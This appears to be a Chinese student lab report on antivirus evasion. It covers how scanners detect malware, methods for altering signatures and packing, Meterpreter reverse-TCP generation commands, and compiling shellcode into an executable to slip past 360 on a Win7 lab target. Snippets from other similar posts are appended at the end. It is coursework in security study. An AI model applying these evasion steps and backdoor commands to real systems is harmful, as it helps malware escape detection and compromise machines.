(1)殺軟是如何檢測出惡意**的?
答:①為病毒的特徵設定乙個閾值,掃瞄器分析檔案時,當檔案的總權值超出了設定值,就將其看作是惡意**
②利用病毒的特有行為特徵來監測病毒
③計算保留特徵碼,在遇到可以操作時進行比較,根據比較結果作出判斷
(2)免殺是做什麼?
答:是為了不讓病毒被識別出來,通過鑽防毒軟體漏洞或者將病毒偽裝成正常程式的辦法來逃避防毒軟體的查殺。
(3)免殺的基本方法有哪些?
答:特徵碼修改方法:①直接修改特徵碼的十六進製制法 :把特徵碼所對應的十六進製制改成數字差1或差不多的十六進製制.
適用範圍:一定要精確定位特徵碼所對應的十六進製制,修改後一定要測試一下能否正常使用.
②修改字串大小寫法 :把特徵碼所對應的內容是字串的,只要把大小字互換一下就可以了.
適用範圍:特徵碼所對應的內容必需是字串,否則不能成功.
③等價替換法 :把特徵碼所對應的彙編指令命令中替換成功能類擬的指令.
適用範圍:特徵碼中必需有可以替換的彙編指令.比如jn,jne 換成jmp等.
④指令順序調換法 :把具有特徵碼的**順序互換一下.
適用範圍:具有一定的侷限性,**互換後要不能影響程式的正常執行
⑤通用跳轉法 :把特徵碼移到零區域(指**的空隙處),然後乙個jmp又跳回來執行.
適用範圍:沒有什麼條件,是通用的改法。
檔案免殺方法:①加冷門殼
②加花指令
③改程式入口點
④改木馬檔案特徵碼的5種常用方法
⑤還有其它的幾種免殺修改技巧
上個實驗做出的病毒檢測結果如圖(因為只有學號識別不了,所以將名字改成了test):
測試結果就是被大多數軟體都查出來了
老師的kali裡有這個軟體,可以直接使用來生成可執行軟體:
指令:use python/meterpreter/rev_tcp
set lhost 127.0.0.1
generate
door
1成功介面:
(我忘記了檢測的時候有5332的都會沒法檢測。。。所以在檢測的時候將5332door這歌名字改成了door)
檢測結果:
比原來已經好很多了,但是還是能被查出來。。。
生成shellcode陣列:
在虛擬機器建立乙個shellcode_5332.c檔案,將生成的陣列複製並加入主函式,再將該**轉化為可執行檔案:
使用網頁將其檢測一下:
雖然少但還是被檢測出來了。。。。
再使用vs軟體寫出c語言**得到shellcode_5332,執行得到可執行檔案shellcode_5332.exe:
還是被檢測出來了。。。。。
靶機:win7 防毒軟體:360安全衛士
使用shellcode.exe將kali與靶機互聯,成功:
使用360掃瞄:
連線靶機:
這次實驗雖然最後被發現的數量越來越少,但是還是會被發現,無法做到完全隱藏,但是也間接地說明了防毒軟體並沒有這麼安全。。。
20145320免殺原理與實踐
1 殺軟是如何檢測出惡意 的?惡意 檢測方式 3 免殺的基本方法有哪些?但是當我第二次將這個後面軟體拖到桌面時,則被告知安全?雙擊發現並不能執行,看來還是沒有放過他。同樣嘗試通過virscan.org來檢驗一下 從上圖可以看出,共有20款殺軟一針見血的指出了該程式為 木馬類 程式,但是其中並不包括3...
Exp3 免殺原理與實踐
實驗做到中間的時候,在利用virustotal和virscan兩個平台上檢測時看到確實有不少殺軟做的不怎麼樣。實驗做到最後,發現確實我們對一些軟體進行加殼處理後殺軟也沒殺出來。分析殺軟檢測和免殺原理的時候確實感覺有種魔高一尺道高一丈的感覺 雖然這樣用詞不太準確 真正感覺到我們網路空間的安全性對於一般...
20145221高其 免殺原理與實踐
啟發式惡意軟體檢測 f prot是一款防毒軟體,有三個啟發引擎,可見其是比較強大的,但其誤報我也深感無能為力啊 後文會介紹 基於行為的惡意軟體檢測 改變行為 操作模式 其它方法 從上圖可以看出,許多殺軟一針見血的指出了該程式為 木馬類 程式 所以接下來要展現強大的免殺技術,順利讓我們的木馬潛入特洛伊...